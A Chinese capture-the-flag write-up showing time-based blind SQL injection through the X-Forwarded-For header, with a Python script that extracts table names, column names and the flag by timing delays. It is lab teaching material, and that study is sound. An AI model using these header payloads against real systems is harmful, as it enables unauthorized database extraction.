点开链接,显示your ip is :xxx。抓包添加参数X-Forwarded-For:192.168.1.1,果然,返回的ip是添加上去的。想起提示我要把攻击我的人都记录db中去!。整理思路,应该是得到X-Forwarded-For参数后,将其存入数据库中,然后在从数据库中取出来。添加单引号等字符,原样返回。试下基于时间的盲注,构造1' and if(length(database())=5,sleep(5),1) and '1'='1,发现逗号没了。换个select case when,构造1' and (select case when length(database())=5 then sleep(5) else 1 end) and '1'='1。当数据库名长度为4时成功延迟响应,确定存在注入。接下来写脚本跑吧。
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import time
chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{}@:\/_-."
tableName = ""
columnName = ""
flag = ""
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
#40是随便写的,只要能多于字段数就行,看见很久没有出数据就说明跑完了,然后爆下一条数据。
for i in range(40):
for char in chars:
headers = {
"Host": "ctf5.shiyanbar.com",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
#爆表名
# "X-FORWARDED-FOR": "1' and (select case when((select count(table_name) from information_schema.tables"
# " where table_schema=database() and table_name like '" + tableName + char + "%')>0)"
# " then sleep(3) else 1 end) and '1'='1"
#爆第二张表
# "X-FORWARDED-FOR": "1' and (select case when((select count(table_name) from information_schema.tables"
# " where table_schema=database()and table_name !='client_ip' and table_name like '" + tableName + char + "%')>0)" " then sleep(3) else 1 end) and '1'='1"
#得到flag表,开始爆列名
# "X-FORWARDED-FOR": "1' and (select case when((select count(column_name) from information_schema.columns"
# " where table_name='flag' and column_name like '" + columnName + char + "%')>0)"
# " then sleep(3) else 1 end) and '1'='1"
#得到flag列,开始跑数据
"X-FORWARDED-FOR":"1' and (select case when ((select count(flag) from flag where flag like '" + flag + char + "%')>0)"
"then sleep(3) else 1 end) and '1'='1"
}
start = time.time()
res = requests.get(url, headers=headers)
end = time.time()
if end - start >= 3:
flag += char
print(flag)
break
去吃个饭flag就应该跑出来了。
网友评论